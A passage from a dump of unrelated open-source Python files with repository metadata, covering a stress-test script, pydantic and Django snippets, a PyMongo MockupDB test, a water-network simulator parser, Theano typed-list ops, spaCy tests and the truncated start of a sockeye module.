metric_wrong_vals] # stress test
for i in range(0,len(tests)):
bash_test=' '.join(['bash -x system_test.sh',
tests[i].m,
tests[i].i,
tests[i].o,
tests[i].e,
'> test_'+str(i)+'.txt'])
subprocess.call(bash_test,shell=True)
if 'Test failed' in open('test_'+str(i)+'.txt').read():
sys.exit()
print('rm test_'+str(i)+'.txt')
subprocess.call('rm test_'+str(i)+'.txt',shell=True)
subprocess.call('make clean',shell=True)
| 36.8125 | 76 | 0.49983 |
16a420497cbc2838885d99cdb809ed834438bdec | 261 | py | Python | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 3 | 2015-06-24T10:59:28.000Z | 2017-09-10T16:49:09.000Z | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 2 | 2020-04-20T21:06:33.000Z | 2020-05-06T10:15:31.000Z | server-admin/model/user.py | yafraorg/yapki | 66ab6f2db2efa7e0c5dbb85fa7c05e6446518129 | [
"Apache-2.0"
] | 1 | 2016-12-02T10:12:42.000Z | 2016-12-02T10:12:42.000Z | from typing import List
from pydantic import BaseModel
class UserBase(BaseModel):
email: str
name: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
is_active: bool
class Config:
orm_mode = True
| 12.428571 | 30 | 0.67433 |
8ea7b92be0bbf63a79053f5f71804d03461f2518 | 253 | py | Python | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | tests/stack_frame_analyzer/utils/parent.py | cesarmerjan/stack_frame_analyzer | 4e9f1899016423ca7c3b919221ff9b4778f0e82c | [
"MIT"
] | null | null | null | from .main import stack_frame_analyzer
class Parent:
@property
def context(self):
return stack_frame_analyzer.get_caller_context(1)
@classmethod
def _get_context(cls):
return stack_frame_analyzer.get_caller_context(1)
| 21.083333 | 57 | 0.735178 |
77c1866a018a430988f7df5152dcc6fe41e4f03c | 737 | py | Python | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | webapp/urls.py | westerjn/cfready-django | 2e0f87c9359d67a8535f81b5d74ac5d43ec1b035 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='home'),
path('polls/', views.index, name='index'),
# ex: /polls/5/
path('<int:question_id>/', views.detail, name='detail'),
# ex: /polls/5/results/
path('<int:question_id>/results/', views.results, name='results'),
# ex: /polls/5/vote/
path('<int:question_id>/vote/', views.vote, name='vote'),
path('delta/', views.delta, name='default'),
path('home/', views.home, name='default'),
path('compute/', views.compute, name='default'),
path('storage/', views.storage, name='default'),
path('data/', views.data, name='default'),
path('info/', views.info, name='default'),
] | 36.85 | 71 | 0.601085 |
2f02503f54270021b825b963770248475b992bf6 | 2,025 | py | Python | test/mockupdb/test_rsghost.py | infinite-skx/mongo-python-driver | bdafc357331813222b1e677b66041dad1fc852a5 | [
"Apache-2.0"
] | null | null | null | test/mockupdb/test_rsghost.py | infinite-skx/mongo-python-driver | bdafc357331813222b1e677b66041dad1fc852a5 | [
"Apache-2.0"
] | 1 | 2021-12-24T11:32:17.000Z | 2021-12-24T11:32:17.000Z | test/mockupdb/test_rsghost.py | Surfndez/mongo-python-driver | 51691246e9b2ef8446f3716c9ba7bab1a9f4e1ad | [
"Apache-2.0"
] | null | null | null | # Copyright 2021-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test connections to RSGhost nodes."""
import datetime
from mockupdb import going, MockupDB
from pymongo import MongoClient
from pymongo.errors import ServerSelectionTimeoutError
import unittest
class TestRSGhost(unittest.TestCase):
def test_rsghost(self):
rsother_response = {
'ok': 1.0, 'ismaster': False, 'secondary': False,
'info': 'Does not have a valid replica set config',
'isreplicaset': True, 'maxBsonObjectSize': 16777216,
'maxMessageSizeBytes': 48000000, 'maxWriteBatchSize': 100000,
'localTime': datetime.datetime(2021, 11, 30, 0, 53, 4, 99000),
'logicalSessionTimeoutMinutes': 30, 'connectionId': 3,
'minWireVersion': 0, 'maxWireVersion': 15, 'readOnly': False}
server = MockupDB(auto_ismaster=rsother_response)
server.run()
self.addCleanup(server.stop)
# Default auto discovery yields a server selection timeout.
with MongoClient(server.uri, serverSelectionTimeoutMS=250) as client:
with self.assertRaises(ServerSelectionTimeoutError):
client.test.command('ping')
# Direct connection succeeds.
with MongoClient(server.uri, directConnection=True) as client:
with going(client.test.command, 'ping'):
request = server.receives(ping=1)
request.reply()
if __name__ == '__main__':
unittest.main()
| 38.207547 | 77 | 0.687901 |
f6e37d74fe9d7940c17297dc80908a58c165981c | 8,605 | py | Python | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | null | null | null | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | null | null | null | dhalsim/parser/input_parser.py | Daveonwave/DHALSIM | c8739e45b87b1b1a9879e2694c94e3d6a0218b59 | [
"MIT"
] | 2 | 2021-06-22T20:16:08.000Z | 2021-06-22T20:21:03.000Z | import sys
import pandas as pd
import wntr
from antlr4 import *
from dhalsim.parser.antlr.controlsLexer import controlsLexer
from dhalsim.parser.antlr.controlsParser import controlsParser
class Error(Exception):
"""Base class for exceptions in this module."""
class NoInpFileGiven(Error):
"""Raised when tag you are looking for does not exist"""
class NotEnoughInitialValues(Error):
"""Raised when there are not enough initial values in a csv"""
def value_to_status(actuator_value):
"""
Translates int corresponding to actuator status.
:param actuator_value: The value from the status.value of the actuator
:type actuator_value: int
"""
if actuator_value == 0:
return "closed"
else:
return "open"
class InputParser:
"""
Class handling the parsing of .inp input files.
:param intermediate_yaml: The intermediate yaml file
"""
def __init__(self, intermediate_yaml):
"""Constructor method"""
self.data = intermediate_yaml
for plc in self.data['plcs']:
if 'sensors' not in plc:
plc['sensors'] = list()
if 'actuators' not in plc:
plc['actuators'] = list()
# Get the INP file path
if 'inp_file' in self.data.keys():
self.inp_file_path = self.data['inp_file']
else:
raise NoInpFileGiven()
# Read the inp file with WNTR
self.wn = wntr.network.WaterNetworkModel(self.inp_file_path)
self.batch_mode = 'batch_simulations' in self.data
def write(self):
"""
Writes all needed inp file sections into the intermediate_yaml.
"""
# Generate PLC controls
self.generate_controls()
# Generate list of actuators + initial values
self.generate_actuators_list()
# Generate list of times
self.generate_times()
# Generate initial values if batch mode is true
if 'initial_tank_data' in self.data:
self.generate_initial_tank_values()
# Generate network loss values if network loss is true
if 'network_loss_data' in self.data:
self.generate_network_losses()
# Generate network delay values if network delay is true
if 'network_delay_data' in self.data:
self.generate_network_delays()
# Add iterations if not existing
if "iterations" not in self.data.keys():
iterations = int(self.data["time"][0]["duration"] / self.data["time"][1]["hydraulic_timestep"])
if iterations <= 0:
print(f"Error in inp file section [TIMES]: (duration: {self.data['time'][0]['duration']} / "
f"hydraultic timestep: {self.data['time'][1]['hydraulic_timestep']}) = {iterations}")
sys.exit(1)
self.data["iterations"] = iterations
# Return the YAML object
return self.data
def generate_controls(self):
"""
Generates list of controls with their types, values, actuators, and
potentially dependant; then adds that to self.data to be written to the yaml.
"""
input_file = FileStream(self.inp_file_path)
tree = controlsParser(CommonTokenStream(controlsLexer(input_file))).controls()
controls = []
for i in range(0, tree.getChildCount()):
child = tree.getChild(i)
# Get all common control values from the control
actuator = str(child.getChild(1))
action = str(child.getChild(2))
if child.getChildCount() == 8:
# This is an AT NODE control
dependant = str(child.getChild(5))
value = float(str(child.getChild(7)))
controls.append({
"type": str(child.getChild(6)).lower(),
"dependant": dependant,
"value": value,
"actuator": actuator,
"action": action.lower()
})
if child.getChildCount() == 6:
# This is a TIME control
value = float(str(child.getChild(5)))
controls.append({
"type": "time",
"value": int(value),
"actuator": actuator,
"action": action.lower()
})
for plc in self.data['plcs']:
plc['controls'] = []
actuators = plc['actuators']
for control in controls:
if control['actuator'] in actuators:
plc['controls'].append(control)
def generate_times(self):
"""
Generates duration and hydraulic timestep and adds to the
data to be written to the yaml file.
"""
# TODO Decide on the timestep (minutes or seconds?)
times = [
{"duration": self.wn.options.time.duration},
{"hydraulic_timestep": self.wn.options.time.hydraulic_timestep}
]
self.data['time'] = times
def generate_actuators_list(self):
"""
Generates list of actuators with their initial states
and adds to the data to be written to the yaml file.
"""
pumps = []
for pump in self.wn.pumps():
pumps.append({
"name": pump[0],
"initial_state": value_to_status(pump[1].status.value)
})
valves = []
for valve in self.wn.valves():
valves.append({
"name": valve[0],
"initial_state": value_to_status(valve[1].status.value)
})
# Append valves to pumps
pumps.extend(valves)
self.data['actuators'] = pumps
def generate_initial_tank_values(self):
"""Generates all tanks with their initial values if running in batch mode"""
initial_values = {}
initial_tank_levels = pd.read_csv(self.data['initial_tank_data'])
self.verify_csv_input(initial_tank_levels, 'initial_tank_data')
# For all columns in csv
for index in range(len(initial_tank_levels.columns)):
name = initial_tank_levels.columns[index]
# Insert tank value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
initial_values[str(name)] = \
float(initial_tank_levels.iloc[data_index, index])
self.data['initial_tank_values'] = initial_values
def generate_network_losses(self):
"""Generates list of routers with their network losses from the input csv"""
network_loss = {}
network_loss_data = pd.read_csv(self.data['network_loss_data'])
self.verify_csv_input(network_loss_data, 'network_loss_data')
# For all columns in csv
for index in range(len(network_loss_data.columns)):
name = network_loss_data.columns[index]
# Insert loss value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
network_loss[str(name)] = \
float(network_loss_data.iloc[data_index, index])
self.data['network_loss_values'] = network_loss
def generate_network_delays(self):
"""Generates list of routers with their network delays from the input csv"""
network_delay = {}
network_delay_data = pd.read_csv(self.data['network_delay_data'])
self.verify_csv_input(network_delay_data, 'network_delay_data')
# For all columns in csv
for index in range(len(network_delay_data.columns)):
name = network_delay_data.columns[index]
# Insert tank : value into data
data_index = self.data["batch_index"] if self.batch_mode else 0
network_delay[str(name)] = \
str(network_delay_data.iloc[data_index, index]) + "ms"
self.data['network_delay_values'] = network_delay
def verify_csv_input(self, dataframe, data):
"""
Verifies the csv files have the proper number of rows for a simulation
:param dataframe: pandas dataframe containing csv data
:param data: name of data that is being verified
"""
num_rows = len(dataframe)
if self.batch_mode:
if num_rows < self.data['batch_simulations']:
raise NotEnoughInitialValues("Provided csv has fewer rows than number of batch simulations: " + data)
else:
if num_rows <= 0:
raise NotEnoughInitialValues("Provided csv has no data: " + data)
| 36.773504 | 117 | 0.59756 |
826c1e2053a7354e3b2519acb79022433b1a13ca | 18,311 | py | Python | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | theano/typed_list/basic.py | bridgeland/Theano-PyMC | ddfbde2d03061dead7190a99b78c7cef7896bd04 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from .type import TypedListType
import theano
from theano.gof import Apply, Constant, Op, Variable
from theano.tensor.type_other import SliceType
from theano import tensor as T
from theano.compile.debugmode import _lessbroken_deepcopy
class _typed_list_py_operators:
def __getitem__(self, index):
return getitem(self, index)
def __len__(self):
return length(self)
def append(self, toAppend):
return append(self, toAppend)
def extend(self, toAppend):
return extend(self, toAppend)
def insert(self, index, toInsert):
return insert(self, index, toInsert)
def remove(self, toRemove):
return remove(self, toRemove)
def reverse(self):
return reverse(self)
def count(self, elem):
return count(self, elem)
# name "index" is already used by an attribute
def ind(self, elem):
return index_(self, elem)
ttype = property(lambda self: self.type.ttype)
dtype = property(lambda self: self.type.ttype.dtype)
ndim = property(lambda self: self.type.ttype.ndim + 1)
class TypedListVariable(_typed_list_py_operators, Variable):
"""
Subclass to add the typed list operators to the basic `Variable` class.
"""
TypedListType.Variable = TypedListVariable
class TypedListConstant(_typed_list_py_operators, Constant):
"""
Subclass to add the typed list operators to the basic `Variable` class.
"""
TypedListType.Constant = TypedListConstant
class GetItem(Op):
# See doc in instance of this Op or function after this class definition.
view_map = {0: [0]}
__props__ = ()
def make_node(self, x, index):
assert isinstance(x.type, TypedListType)
if not isinstance(index, Variable):
if isinstance(index, slice):
index = Constant(SliceType(), index)
return Apply(self, [x, index], [x.type()])
else:
index = T.constant(index, ndim=0, dtype="int64")
return Apply(self, [x, index], [x.ttype()])
if isinstance(index.type, SliceType):
return Apply(self, [x, index], [x.type()])
elif isinstance(index, T.TensorVariable) and index.ndim == 0:
assert index.dtype == "int64"
return Apply(self, [x, index], [x.ttype()])
else:
raise TypeError("Expected scalar or slice as index.")
def perform(self, node, inputs, outputs):
(x, index) = inputs
(out,) = outputs
if not isinstance(index, slice):
index = int(index)
out[0] = x[index]
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name, index = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
return (
"""
%(output_name)s = (typeof %(output_name)s) PyList_GetItem( (PyObject*) %(x_name)s, *((npy_int64 *) PyArray_DATA(%(index)s)));
if(%(output_name)s == NULL){
%(fail)s
}
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
getitem = GetItem()
"""
Get specified slice of a typed list.
Parameters
----------
x
Typed list.
index
The index of the value to return from `x`.
"""
class Append(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [1]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 1]}
self.view_map = {0: [0]}
def make_node(self, x, toAppend):
assert isinstance(x.type, TypedListType)
assert x.ttype == toAppend.type, (x.ttype, toAppend.type)
return Apply(self, [x, toAppend], [x.type()])
def perform(self, node, inputs, outputs):
(x, toAppend) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
toAppend = _lessbroken_deepcopy(toAppend)
out[0].append(toAppend)
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, toAppend = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) %(toAppend)s)){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
append = Append()
"""
Append an element at the end of another list.
Parameters
----------
x
The base typed list.
y
The element to append to `x`.
"""
class Extend(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [1]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 1]}
self.view_map = {0: [0]}
def make_node(self, x, toAppend):
assert isinstance(x.type, TypedListType)
assert x.type == toAppend.type
return Apply(self, [x, toAppend], [x.type()])
def perform(self, node, inputs, outputs):
(x, toAppend) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
if toAppend:
o = out[0]
for i in toAppend:
o.append(_lessbroken_deepcopy(i))
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, toAppend = inp[0], inp[1]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
int i =0;
int length = PyList_GET_SIZE((PyObject*) %(toAppend)s);
if(%(output_name)s==NULL){
%(fail)s
};
for(i; i < length; i++){
if(PyList_Append( (PyObject*) %(output_name)s,(PyObject*) PyList_GetItem((PyObject*) %(toAppend)s,i))==-1){
%(fail)s
};
}
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version_(self):
return (1,)
extend = Extend()
"""
Append all elements of a list at the end of another list.
Parameters
----------
x
The typed list to extend.
toAppend
The typed list that will be added at the end of `x`.
"""
class Insert(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
# TODO: make destroy_handler support having views and
# destroyed version of multiple inputs.
# self.view_map = {0: [2]}
else:
# TODO: make destroy_handler support multiple view
# self.view_map = {0: [0, 2]}
self.view_map = {0: [0]}
def make_node(self, x, index, toInsert):
assert isinstance(x.type, TypedListType)
assert x.ttype == toInsert.type
if not isinstance(index, Variable):
index = T.constant(index, ndim=0, dtype="int64")
else:
assert index.dtype == "int64"
assert isinstance(index, T.TensorVariable) and index.ndim == 0
return Apply(self, [x, index, toInsert], [x.type()])
def perform(self, node, inputs, outputs):
(x, index, toInsert) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
# need to copy toAppend due to destroy_handler limitation
toInsert = _lessbroken_deepcopy(toInsert)
out[0].insert(index, toInsert)
def __str__(self):
return self.__class__.__name__
# DISABLED AS WE NEED TO UPDATE IT TO COPY toAppend().
def _c_code_(self, node, name, inp, out, sub):
x_name, index, toInsert = inp[0], inp[1], inp[2]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Insert((PyObject*) %(output_name)s, *((npy_int64 *) PyArray_DATA(%(index)s)), (PyObject*) %(toInsert)s)==-1){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
insert = Insert()
"""
Insert an element at an index in a typed list.
Parameters
----------
x
The typed list to modify.
index
The index where to put the new element in `x`.
toInsert
The new element to insert.
"""
class Remove(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
else:
self.view_map = {0: [0]}
def make_node(self, x, toRemove):
assert isinstance(x.type, TypedListType)
assert x.ttype == toRemove.type
return Apply(self, [x, toRemove], [x.type()])
def perform(self, node, inputs, outputs):
(x, toRemove) = inputs
(out,) = outputs
if not self.inplace:
out[0] = list(x)
else:
out[0] = x
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list.
"""
for y in range(out[0].__len__()):
if node.inputs[0].ttype.values_eq(out[0][y], toRemove):
del out[0][y]
break
def __str__(self):
return self.__class__.__name__
remove = Remove()
"""Remove an element from a typed list.
Parameters
----------
x
The typed list to be changed.
toRemove
An element to be removed from the typed list.
We only remove the first instance.
Notes
-----
Python implementation of remove doesn't work when we want to remove an ndarray
from a list. This implementation works in that case.
"""
class Reverse(Op):
# See doc in instance of this Op after the class definition.
__props__ = ("inplace",)
def __init__(self, inplace=False):
self.inplace = inplace
if self.inplace:
self.destroy_map = {0: [0]}
else:
self.view_map = {0: [0]}
def make_node(self, x):
assert isinstance(x.type, TypedListType)
return Apply(self, [x], [x.type()])
def perform(self, node, inp, outputs):
(out,) = outputs
if not self.inplace:
out[0] = list(inp[0])
else:
out[0] = inp[0]
out[0].reverse()
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name = inp[0]
output_name = out[0]
fail = sub["fail"]
if not self.inplace:
init = (
"""
%(output_name)s = (PyListObject*) PyList_GetSlice((PyObject*) %(x_name)s, 0, PyList_GET_SIZE((PyObject*) %(x_name)s)) ;
"""
% locals()
)
else:
init = (
"""
%(output_name)s = %(x_name)s;
"""
% locals()
)
return (
init
+ """
if(%(output_name)s==NULL){
%(fail)s
};
if(PyList_Reverse((PyObject*) %(output_name)s)==-1){
%(fail)s
};
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
reverse = Reverse()
"""
Reverse the order of a typed list.
Parameters
----------
x
The typed list to be reversed.
"""
class Index(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x, elem):
assert isinstance(x.type, TypedListType)
assert x.ttype == elem.type
return Apply(self, [x, elem], [T.scalar()])
def perform(self, node, inputs, outputs):
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list
"""
(x, elem) = inputs
(out,) = outputs
for y in range(len(x)):
if node.inputs[0].ttype.values_eq(x[y], elem):
out[0] = np.asarray(y, dtype=theano.config.floatX)
break
def __str__(self):
return self.__class__.__name__
index_ = Index()
class Count(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x, elem):
assert isinstance(x.type, TypedListType)
assert x.ttype == elem.type
return Apply(self, [x, elem], [T.scalar()])
def perform(self, node, inputs, outputs):
"""
Inelegant workaround for ValueError: The truth value of an
array with more than one element is ambiguous. Use a.any() or a.all()
being thrown when trying to remove a matrix from a matrices list
"""
(x, elem) = inputs
(out,) = outputs
out[0] = 0
for y in range(len(x)):
if node.inputs[0].ttype.values_eq(x[y], elem):
out[0] += 1
out[0] = np.asarray(out[0], dtype=theano.config.floatX)
def __str__(self):
return self.__class__.__name__
count = Count()
"""
Count the number of times an element is in the typed list.
Parameters
----------
x
The typed list to look into.
elem
The element we want to count in list.
The elements are compared with equals.
Notes
-----
Python implementation of count doesn't work when we want to count an ndarray
from a list. This implementation works in that case.
"""
class Length(Op):
# See doc in instance of this Op after the class definition.
__props__ = ()
def make_node(self, x):
assert isinstance(x.type, TypedListType)
return Apply(self, [x], [T.scalar(dtype="int64")])
def perform(self, node, x, outputs):
(out,) = outputs
out[0] = np.asarray(len(x[0]), "int64")
def __str__(self):
return self.__class__.__name__
def c_code(self, node, name, inp, out, sub):
x_name = inp[0]
output_name = out[0]
fail = sub["fail"]
return (
"""
if(!%(output_name)s)
%(output_name)s=(PyArrayObject*)PyArray_EMPTY(0, NULL, NPY_INT64, 0);
((npy_int64*)PyArray_DATA(%(output_name)s))[0]=PyList_Size((PyObject*)%(x_name)s);
Py_INCREF(%(output_name)s);
"""
% locals()
)
def c_code_cache_version(self):
return (1,)
length = Length()
"""
Returns the size of a list.
Parameters
----------
x
Typed list.
"""
class MakeList(Op):
__props__ = ()
def make_node(self, a):
assert isinstance(a, (tuple, list))
a2 = []
for elem in a:
if not isinstance(elem, theano.gof.Variable):
elem = theano.tensor.as_tensor_variable(elem)
a2.append(elem)
if not all(a2[0].type == elem.type for elem in a2):
raise TypeError("MakeList need all input variable to be of the same type.")
tl = theano.typed_list.TypedListType(a2[0].type)()
return Apply(self, a2, [tl])
def perform(self, node, inputs, outputs):
(out,) = outputs
# We need to make sure that we don't get a view on our inputs
out[0] = [_lessbroken_deepcopy(inp) for inp in inputs]
make_list = MakeList()
"""
Build a Python list from those Theano variable.
Parameters
----------
a : tuple/list of Theano variable
Notes
-----
All Theano variables must have the same type.
"""
| 26.614826 | 133 | 0.551253 |
a123565e0a473b72f9d3347219d699f273753192 | 2,566 | py | Python | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | 1 | 2019-10-09T10:13:53.000Z | 2019-10-09T10:13:53.000Z | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | null | null | null | tests/py/test_communities.py | webmaven/gratipay.com | 31f6bcf903029895a4c56290aedde755e852c82f | [
"CC0-1.0"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.testing import Harness
class Tests(Harness):
def setUp(self):
Harness.setUp(self)
# Alice joins a community.
self.alice = self.make_participant("alice", claimed_time='now', last_bill_result='')
self.client.POST( '/for/communities.json'
, {'name': 'something', 'is_member': 'true'}
, auth_as='alice'
)
def test_community_member_shows_up_on_community_listing(self):
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants
def test_givers_show_up_on_community_page(self):
# Alice tips bob.
bob = self.make_participant('bob', claimed_time='now')
self.alice.set_tip_to(bob, '1.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 4 # entries in both New Participants and Givers
assert 'bob' not in html
def test_givers_dont_show_up_if_they_give_zero(self):
# Alice tips bob.
bob = self.make_participant('bob', claimed_time='now')
self.alice.set_tip_to(bob, '1.00')
self.alice.set_tip_to(bob, '0.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants only
assert 'bob' not in html
def test_receivers_show_up_on_community_page(self):
# Bob tips alice.
bob = self.make_participant("bob", claimed_time='now', last_bill_result='')
bob.set_tip_to(self.alice, '1.00')
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 4 # entries in both New Participants and Receivers
assert 'bob' not in html
def test_receivers_dont_show_up_if_they_receive_zero(self):
# Bob tips alice.
bob = self.make_participant("bob", claimed_time='now', last_bill_result='')
bob.set_tip_to(self.alice, '1.00')
bob.set_tip_to(self.alice, '0.00') # zero out bob's tip
html = self.client.GET('/for/something/', want='response.body')
assert html.count('alice') == 2 # entry in New Participants only
assert 'bob' not in html
def test_community_listing_works_for_pristine_community(self):
html = self.client.GET('/for/pristine/', want='response.body')
assert 'first one here' in html
| 38.298507 | 92 | 0.641076 |
6b9f8a72b072dc7b30c9a5d98f4e41f96f7135da | 475 | py | Python | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | 1 | 2020-01-29T19:02:04.000Z | 2020-01-29T19:02:04.000Z | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | 1 | 2021-08-16T13:39:17.000Z | 2021-08-16T13:39:40.000Z | spacy/tests/lang/hr/test_lemma.py | jaydeepborkar/spaCy | 16aa092fb5cffb5ec7079951ea0c04cb96733b3e | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize(
"string,lemma",
[
("trčao", "trčati"),
("adekvatnim", "adekvatan"),
("dekontaminacijama", "dekontaminacija"),
("filologovih", "filologov"),
("je", "biti"),
("se", "sebe"),
],
)
def test_hr_lemmatizer_lookup_assigns(hr_tokenizer, string, lemma):
tokens = hr_tokenizer(string)
assert tokens[0].lemma_ == lemma
| 22.619048 | 67 | 0.612632 |
2500c43c5e6f390a46ae0ff53464de95586d2b77 | 28,775 | py | Python | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 8 | 2019-10-02T09:14:31.000Z | 2020-07-07T09:40:04.000Z | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 2 | 2021-03-07T08:34:42.000Z | 2021-03-25T22:57:37.000Z | sockeye/lexical_constraints.py | tholiao/sockeye | f33b600dc77ae9f295c05015e2af9045f3a74088 | [
"Apache-2.0"
] | 4 | 2019-10-10T06:34:41.000Z | 2021-07-19T09:11:20.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import copy
import logging
from operator import attrgetter
from typing import Dict, List, Optional, Tuple, Set
import mxnet as mx
import numpy as np
logger = logging.getLogger(__name__)
# Represents a list of raw constraints for a sentence. Each constraint is a list of target-word IDs.
RawConstraintList = List[List[int]]
class AvoidTrie:
"""
Represents a set of phrasal constraints for an input sentence.
These are organized into a trie.
"""
def __init__(self,
